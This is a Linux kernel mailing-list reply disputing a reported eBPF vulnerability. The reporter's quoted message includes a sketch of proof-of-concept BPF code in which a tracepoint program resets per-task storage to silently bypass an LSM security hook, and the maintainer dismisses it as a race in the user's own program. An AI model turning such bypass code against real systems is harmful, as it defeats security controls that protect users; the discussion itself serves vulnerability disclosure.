Re: Interruptable eBPF programs

Alexei Starovoitov <alexei.starovoitov@xxxxxxxxx> · Mon, 30 Jan 2023 08:42:55 -0800

On Mon, Jan 30, 2023 at 8:01 AM Daniel Borkmann <daniel@xxxxxxxxxxxxx> wrote:
>
> On 1/30/23 1:12 PM, Ori Glassman wrote:
> > Hi everyone,
> >
> >
> > Since the patch to disable process migration instead of disabling preemption in eBPF programs, the latter are potentially susceptible to a reschedule mid-execution.

Ori,

security@kernel alias is not the place to ask bpf related questions.
Yaniv, from your team, already brought it up here:
https://lore.kernel.org/bpf/CAADnVQ++LzKt9Q-GtGXknVBqyMqY=vLJ3tR3NNGG3P66gvVCFQ@xxxxxxxxxxxxxx/

You cannot assume that different bpf progs attached to various
events like tracepoints and lsm hooks won't overlap.
It's a bug in your program. Nothing else.

> Thanks for the report, Ori. We'll take a look and get back to you (also Cc'ing KP and Alexei
> for visibility in here).
>
> > bpf_perf_event_output helper in an eBPF program, can trigger irq_work->arch_irq_work_raise, which will send an ipi to the current CPU, which may reschedule.
> >
> > By hooking a tracepoint such as sched_process_free that runs within an interrupt context, an execution flow (of a certain CPU) like the following may occur:
> > - start execution of lsm/<some_func> and executing bpf_perf_event_output within the hook code
> > - while executing bpf_perf_event_output, gets rescheduled and runs tp/sched_process_free
> > - tp/sched_process_free returns and the CPU continues execution of lsm/<some_func>
> >
> > Using per-CPU data is a known issue in this kind of environment [1], this is also relevant for per-task local storage implemented in v5.11 [2].
> >
> > This is risky in general but becomes particularly dangerous when used in LSM modules (such as apparmor), since the block/allow logic may rely on shared storage that may be manipulated mid-execution from the interrupt context and corrupt the decision of the module.
> > A very un-harm example of such usage can be seen in bpf selftests [3].
> >
> > This becomes a vulnerability if an LSM hook uses a pinned per-task local storage - which is not expected to get corrupted mid execution, since an attacker may load a program such as tp/sched_process_free, and bypass silently the LSM hook by corrupting the self-storage. The flaw is in the per-task local storage, which is not reliable.
> >
> > An example:
> > ---------------------------------------------------------------------------
> > // User loads the following program:
> > SEC("lsm/bprm_creds_for_exec")
> > int BPF_PROG(secure_exec, struct linux_binprm *bprm)
> > {
> >      int *secureexec;
> >      secureexec = bpf_task_storage_get(&per_task_map, bpf_get_current_task_btf(), 0, BPF_LOCAL_STORAGE_GET_F_CREATE); // assume per_task_map is pinned
> >
> >      if (secureexec && STR_EQUALS(bprm->filename, "some_virus")) // assume this condition is fulfilled
> >          *secureexec = 1;
> >
> > // secureexec is now 1
> >      ...
> >      ...
> >      ...
> >      bpf_perf_event_output();
> >      ...
> >      ...
> >      ...
> >
> >      // secureexec is expected to be 1, but was changed from the interrupted context and is now 0
> >      bpf_bprm_opts_set(bprm, *secureexec);
> >
> >      // the binary "some_virus" will run without AT_SECURE
> >
> >      return 0;
> > }
> >
> > // The attacker code:
> > SEC("raw_tracepoint/sched_process_free")
> > int tracepoint__sched_sched_process_free(struct bpf_raw_tracepoint_args *ctx)
> > {
> >      int *secureexec;
> >      secureexec = bpf_task_storage_get(&per_task_map, bpf_get_current_task_btf(), 0, BPF_LOCAL_STORAGE_GET_F_CREATE); // uses per_task_map pinned map that was defined in a different eBPF program
> >      if (secureexec)
> >          *secureexec = 0; // always turn off secureexec
> >
> >      return 0;
> > }

These two programs access some task local storage.
This code racy regardless of preempt_disable vs migrate_disable.
bpf_task_storage_get() of the same task can run on different cpus.

Whether trace_sched_process_free and security_bprm_creds_for_exec
can happen on different cpus is kernel implementation detail.

There looks to be another bug in the above:
doing bpf_get_current_task_btf from raw_tracepoint/sched_process_free
will return task_struct of the worker thread.
I don't think it's the one you want.

Anyway, please start a clean thread at bpf@vger with bpf questions.
Don't spam security@kernel.

---------------------------------------------------------------------------
> >
> > Similarly, in cases where the LSM hook decides the return value (deny/allow) based on data from the local storage, this can also be altered by the attacker, resulting in doing a malicious action that the LSM module should normally block.
> >
> >
> > I'd like to propose a tentative public disclosure date on 02/06/2023 12:00UTC.

You must be kidding.

> >
> >
> > [1] https://lwn.net/Articles/836503/
> > [2] https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919
> > [3] https://elixir.bootlin.com/linux/latest/source/tools/testing/selftests/bpf/progs/bprm_opts.c#L24
> >
> >
> > Thanks,
> > Ori
> >
>